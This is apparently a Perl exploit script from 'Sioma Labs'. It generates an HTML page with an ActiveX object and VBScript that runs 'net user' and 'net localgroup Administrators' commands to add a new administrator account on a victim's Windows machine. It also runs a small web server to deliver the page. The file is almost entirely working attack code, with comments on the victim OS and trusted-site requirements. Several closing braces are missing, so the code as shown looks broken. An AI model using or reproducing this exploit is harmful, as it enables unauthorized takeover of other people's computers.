use strict;
use Socket;
use IO::Socket;
print "\n";
print "800008 8 \n";
print "8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee\n";
print "8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | \n";
print " 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee \n";
print "e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 \n";
print "8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 \n";
print "-----------------------------------------------------------\n";
print " Useage : $0 Port \n";
print " Please Read the Instruction befor you use this \n";
print " ---------------------------------\n";
sub parse_form {
my $data = $_[0];
my %data;
foreach (split /&/, $data) {
my ($key, $val) = split /=/;
$val =~ s/\+/ /g;
$val =~ s/%(..)/chr(hex($1))/eg;
$data{$key} = $val;}
return %data; }
my $port = shift;
defined($port) or die "Usage: $0 Port \n";
mkdir("public_html", 0777) || print $!;
my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html";
print " [+] Account Name : "; chomp(my $acc=<STDIN>);
print " [+] Account Password : "; chomp(my $pass=<STDIN>);
print " [+] Your IP : "; chomp (my $ip=<STDIN>);
#------------- Exploit -----------------
my $iexplt= "public_html/index.html";
open (myfile, ">>$iexplt");
print myfile "<html>\n";
print myfile "<title> IE User Add Test </title>\n";
print myfile "<head>";
print myfile "</font></b></p>\n";
print myfile "<p>\n";
print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n";
print myfile "></object>\n";
print myfile "<script language='vbscript'>\n";
print myfile "adduser=";
print myfile '"cmd';
print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc ";
print myfile '/add"';
print myfile "\n";
print myfile "exploit.run adduser \n";
print myfile "\n </script></p>\n";
print " [+] ----------------------------------------\n";
print " [-] Link Genetrated : http://$ip:$port/index.html\n";
close (myfile);
my $server = new IO::Socket::INET(Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
Reuse => 1);
$server or die "Unable to create server socket: $!" ;
while (my $client = $server->accept()) {
my %request = ();
my %data;
local $/ = Socket::CRLF;
while (<$client>) {
if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) {
$request{METHOD} = uc $1;
$request{URL} = $2;
$request{HTTP_VERSION} = $3;
elsif (/:/) {
(my $type, my $val) = split /:/, $_, 2;
$type =~ s/^\s+//;
foreach ($type, $val) {
$request{lc $type} = $val;
elsif (/^$/) {
read($client, $request{CONTENT}, $request{'content-length'})
if defined $request{'content-length'};
if ($request{METHOD} eq 'GET') {
if ($request{URL} =~ /(.*)\?(.*)/) {
$request{URL} = $1;
$request{CONTENT} = $2;
%data = parse_form($request{CONTENT});
} else {
%data = ();
$data{"_method"} = "GET";
} elsif ($request{METHOD} eq 'POST') {
%data = parse_form($request{CONTENT});
$data{"_method"} = "POST";
} else {
$data{"_method"} = "ERROR";
my $localfile = $DOCUMENT_ROOT.$request{URL};
if (open(FILE, "<$localfile")) {
print $client "HTTP/1.0 200 OK", Socket::CRLF;
print $client "Content-type: text/html", Socket::CRLF;
print $client Socket::CRLF;
my $buffer;
while (read(FILE, $buffer, 4096)) {
print $client $buffer;
$data{"_status"} = "200";
else {
print $client "HTTP/1.0 404 Not Found", Socket::CRLF;
print $client Socket::CRLF;
print $client "<html><body>404 Not Found</body></html>";
$data{"_status"} = "404";
print ($DOCUMENT_ROOT.$request{URL},"\n");
foreach (keys(%data)) {
print (" $_ = $data{$_}\n"); }
close $client;
# Sioma Labs
# http://siomalabs.com
# Sioma Agent 154
# This has been tested on windows envirnment(VisTa) . and the victom OS was windows xp sp2 ( InterNET eXplorer 7 )
# To use this on remote PC the generated link should be on victims trusted site list (tools >Internet Option> Security > Trusted Site> Sites)
# No requrement to run it locally . just open the exploit(public_html/index.html) with the IE
# Test Run ( Used OS : Vista) / ( Victim Os : XP SP2 )
# -------------------------------------------------------------